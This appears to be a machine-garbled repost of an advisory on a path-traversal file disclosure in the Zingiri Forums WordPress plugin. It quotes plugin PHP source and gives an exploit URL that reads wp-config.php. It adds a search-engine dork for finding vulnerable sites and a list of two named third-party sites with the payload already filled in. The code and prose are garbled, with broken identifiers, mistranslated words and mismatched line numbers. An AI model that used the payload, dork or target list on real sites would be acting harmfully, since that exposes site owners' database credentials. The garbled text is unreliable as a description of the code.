WordPress zingsiri Forums arbitrary file disclosure (including restoration methods)

Refer:

WordPress zingsiri Forums arbitrary file disclosure
Http://ceriksen.com/2013/01/12/wordpress-zingiri-forums-arbitrary-file-disclosure/

Secunia Advisory SA50833
Http://secunia.com/advisories/50833/

 

Analysis of vulnerability

The zingsiri Web Forums for WordPress writes our a header for the forum in forum. php through adding an action to wp_head.

44 add_action ('wp _ head', 'zing _ forum_header ');

686 function zing_forum_header ()
687 {
688 global $ zing_forum_content;
689 global $ zing_forum_menu;
690 $ output = zing_forum_output ("content ");
691
692 zing_integrator_cut ($ output, '<div id = "footer">', '</div>'); // remove footer
693 zing_integrator_cut ($ output, '<span class = "forgot_password">', '</span> ');
694
695 $ zing_forum_content = $ output;
696 www.2cto.com
697 echo '<script type = "text/javascript" language = "javascript"> ';
698 echo "var zing_forum_url = '". ZING_FORUM_URL. "ajax /';";
699 echo "var zing_forum_index = '". get_option ('home'). "/index. php? ';";
700 echo "function zing_forum_url_ajax (s) {return zing_forum_url + s ;}";
701 echo '</script> ';
702
703 echo '<link rel = "stylesheet" type = "text/css" href = "'. ZING_FORUM_URL. 'zing.css" media = "screen"/> ';
704}

So on each load of the WordPress blog it will call into zing_forum_header. The first call it makes it into zing_forum_output, which is rather long. I 've highlighted two areas:

456 function zing_forum_output ($ process ){
457 global $ post, $ wpdb, $ zing_forum_loaded, $ zing_forum_to_include, $ zing_forum_mode;
458
459 $ postVar = array ();
460 switch ($ process)
461 {
462 case & quot; content & quot ":
463 if (isset ($ post) $ cf = get_post_custom ($ post-> ID );
464 if (isset ($ _ GET ['zforum '])
465 {
466 $ zing_forum_to_include =_ _ GET ['zforum'];
467 $ zing_forum_mode = "forum ";
468}

We can affect the value of $ zing_forum_to_include through the zforum GET variable. this is then used in a big else if statement. here is the block of code that is executed if we set that to css:

541} elseif ($ zing_forum_to_include = 'css '){
542 maid ();
543 if (isset ($ _ GET ['stylesheet ']) $ key = $ _ GET ['stylesheet'];
544 else $ key = $ _ GET ['url'];
545 if (isset ($ _ SESSION ['ccforum '] ['stylesheet'] [$ key]) {
546 $ output = $ _ SESSION ['ccforum '] ['stylesheet'] [$ key];
547} else {
548 if (isset ($ _ GET ['stylesheet ']) {
549 $ http = zing_forum_http ("mybb", 'css. php ',"");
550 $ news = new zHttpRequest ($ http, 'zingsiri-forum ');
551 if (! $ News-> curlInstalled () return "cURL not installed ";
552 elseif (! $ News-> live () return "a http Error occured ";
553 $ output = $ news-> DownloadToString ();
554 $ output = str_replace ('url (images/', 'url ('. ZING_MYBB_URL. '/images/', $ output );
555
556} elseif ($ _ GET ['url']) {
557 $ url = $ _ GET ['url'];
558 $ output = file_get_contents (ZING_MYBB_DIR. '/cache/themes/'. $ url );
559}
560 $ f [] = '/^ body .*{(.*?) /';
561 $ r [] = '{$1 ';
562 $ f [] = '/. zingbody /';
563 $ r [] = '';
564 $ f [] = '/(.*?). {(.*?) /';
565 $ r [] = '. ccforum $1 {$2 ';
566 $ f [] = '/(.*?), (.*?). {(.*?) /';
567 $ r [] = '$1,. ccforum $2 {$3 ';
568 $ f [] = '/(.*?), (.*?), (.*?). {(.*?) /';
569 $ r [] = '$1, $2,. ccforum $3 {$4 ';
570 $ output = preg_replace ($ f, $ r, $ output,-1, $ count );
571 if ($ output) $ _ SESSION ['ccforum '] ['stylesheet'] [$ key] = $ output;
572}
573 header ("Content-type: text/css ");
574 echo $ output;
575 die ();

If we don't set anything until CT the "url" get variable, we can cause it to be fed into the file_get_contents call on line 554. we can abuse this to disclose the contents of the wp-config.php file like this:

Http: // URL/wordpress /? Zforum = css & url =.../wp-config.php

 

Google: inurl: plugins/zingsiri-forum

Lay gun list:
Http://themakeupmorgue.com /? Zforum = css & url =.../wp-config.php
Http://www.4newdesign.com /? Zforum = css & url =.../wp-config.php

Solution:

Comparison between version 1.4.4 and version 1.4.2
557 $ url = $ _ GET ['url'];
Change
555 $ url = str_replace ('..', '', $ _ GET ['url']);

".." Is filtered out to prevent the upper-level directory from being jumped.